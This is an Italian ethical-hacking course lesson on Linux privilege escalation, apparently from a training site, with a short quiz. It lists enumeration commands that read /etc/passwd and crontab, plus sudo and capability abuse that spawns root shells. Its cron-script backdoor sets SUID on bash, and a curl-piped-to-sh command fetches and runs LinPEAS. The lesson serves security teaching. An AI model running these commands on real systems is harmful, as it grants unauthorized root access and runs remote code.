💻 Software hacking Avanzato ⏱ 90 min 👁 5 visualizzazioni

Corso Hacking Etico #9: Privilege Escalation Linux

Davide Russo @CyberSec_Italia · 1 giorni fa · aggiornato 2 ore fa
📥
Piano di Studio Completo — Scarica il PDF
Percorso strutturato con settimane, risorse e checklist. Gratis, nessuna registrazione richiesta.
⬇ Scarica PDF

Da User a Root

Hai accesso come utente normale. Ora devi diventare root.

Enumerazione Prima di Tutto

uname -a && id && whoami
cat /etc/passwd
cat /etc/crontab

SUID Binaries

find / -perm -4000 2>/dev/null
# Controlla su gtfobins.github.io

Sudo Misconfiguration

sudo -l
# (ALL) NOPASSWD: /usr/bin/python3
sudo python3 -c "import os; os.system('/bin/bash')"

Cron Jobs

cat /etc/crontab
# Se script root e scrivibile:
echo "chmod +s /bin/bash" >> /path/script.sh
bash -p

Capabilities

getcap -r / 2>/dev/null
python3 -c "import os; os.setuid(0); os.system('/bin/bash')"

LinPEAS

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
GTFOBins: gtfobins.github.io - catalogo binari Unix sfruttabili.

Conclusione

Nel Modulo 10: privilege escalation Windows.

🧠 Metti alla prova le tue conoscenze

3 domande · Soglia superamento: 70%

1. Quale tool automatizza l'enumerazione per privilege escalation su Linux?

2. Cosa sono i SUID binaries e perché sono interessanti?

3. Quale comando trova tutti i binari SUID nel sistema?

Accedi per completare il quiz.

💬 Commenti (0)

Nessun commento ancora. Sii il primo!

Accedi per commentare.